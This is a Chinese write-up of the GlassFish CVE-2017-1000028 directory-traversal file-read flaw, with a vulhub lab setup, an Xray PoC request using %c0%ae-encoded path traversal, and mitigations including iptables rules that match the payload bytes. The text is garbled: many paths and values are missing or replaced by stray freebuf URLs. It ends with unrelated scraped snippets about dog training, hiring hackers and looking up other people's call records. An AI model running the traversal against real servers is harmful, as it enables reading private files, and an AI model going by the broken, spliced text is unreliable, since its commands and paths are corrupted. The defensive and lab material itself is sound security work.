glassfish 是一款 java 编写的跨平台的开源的应用服务器。
java语言中会把 解析为 ,最后转义为ASCCII字符的(点)。利用 来向上跳转,达到目录穿越、任意文件读取的效果。所以 glassfish 这个 poc 实际上就是//https://www.freebuf.com/articles/etc/passwd。
影响版本:
< 4.1.1(不含 4.1.1)
如下测试环境借助 vulhub 的 docker 镜像,附上 P 师傅的链接:https://github.com/vulhub/vulhub?
编译、运行测试环境,本环境超级管理员密码在 中设置,默认为 ,在4848端口利用该密码可以登录管理员账户。
docker-compose up -d
环境运行后,访问 和 即可查看 web 页面。其中,8080 端口是网站内容,4848 端口是 GlassFish 管理中心。
无需登录,直接访问 ,发现已成功读取 内容:
如下是 Xray 的 POC,其只穿越了上级目录,检测了版本信息,不涉及敏感信息,但同样也验证了漏洞存在。
name: poc-yaml-glassfish-cve-2017-1000028-lfi rules: - method: GET path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF follow_redirects: true expression: | response.status==200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:") detail: version: <4.1.0 author: sharecast links: - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0
1. 关闭远程管理关闭远程管理,关闭后只允许本地访问,会提示要求输入用户名和密码,开发环境或者对服务器安全要求较高的环境可以选择这么做,修改该设置后应该重启 GlassFish 服务
https://www.freebuf.com/articles/web/asadmin change-admin-password https://www.freebuf.com/articles/web/asadmin disable-secure-admin https://www.freebuf.com/articles/web/asadmin stop-domain https://www.freebuf.com/articles/web/asadmin start-domain asadmin.bat change-admin-password asadmin.bat disable-secure-admin asadmin.bat stop-domain asadmin.bat start-domain
需要注意的是,关闭远程访问只能禁用远程 login 登录,但是攻击 url 还是可以访问,任意文件读取依然存在
2. IPtables 规则
iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string '..\%c0\%af' -j DROP iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string '\%c0\%ae/' -j DROP iptables -I INPUT -p tcp --dport 4848 -m string --to 120 --algo bm --string 'https://www.freebuf.com/articles/' -j DROP //该规则无法防御HTTPS SSL方案
3. 禁用 web.xml theme 映射\glassfish4\glassfish\lib\install\applications__admingui\WEB-INF\web.xml
<!-- <servlet-mapping> <servlet-name>ThemeServlet</servlet-name> <url-pattern>/theme/*</url-pattern> </servlet-mapping> -->
重启 glassfish 后生效
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
金毛几个月开始训练最好呢?一般来说3-4个月是金毛幼犬训练的最好时间点。金毛狗狗是非常聪明的一种大型犬,我们一定不要错过这个金毛幼犬的最佳训练时间。 一、为什么说3-4个月是金毛 狗狗最佳训练...
找一个黑客朋友相关问题 黑客入侵模拟器手机版相关问题 黑客可以通过手机号干什么 游戏黑客技术网(黑客游戏网) 黑...
比吊牌价店划算的奥特莱斯商城,能好货吗? 金融管理决策第一号:ENNweekly(?长按可拷贝) 文|《财经国家周刊》新闻记者 张耀兰 “我脚底这鞋Prada的鞋,上年的样...
高屋建瓴百思特网是什么意思(高屋建瓴典故) 建:瀽,覆水;瓴:盛水的瓶子。在屋顶上将瓶子里的水倒下来。比喻居高临下,势如破竹,不可阻挡。语出《史记•高祖本纪》:“秦,形胜之国…… 地势便利,其...
手机通话清单查别人手机通话记录查询手机手机定位找人,通话记录清单查询五指山坐落于三亚市东北部的海棠湾。距三亚市管理中心30公里,距三亚凤凰国际飞机场38千米 ,相邻海南东方高速路,交通出行方便快捷 。...
我想找个黑客的电话 网络上面的黑客专家要怎么联系呢,现在不会有什么好心的黑客,不要把白帽黑客和哦黑帽黑客等同,黑帽黑客与白帽黑客是完全不同的,这部分的黑客完全就等同于犯罪分子。 ...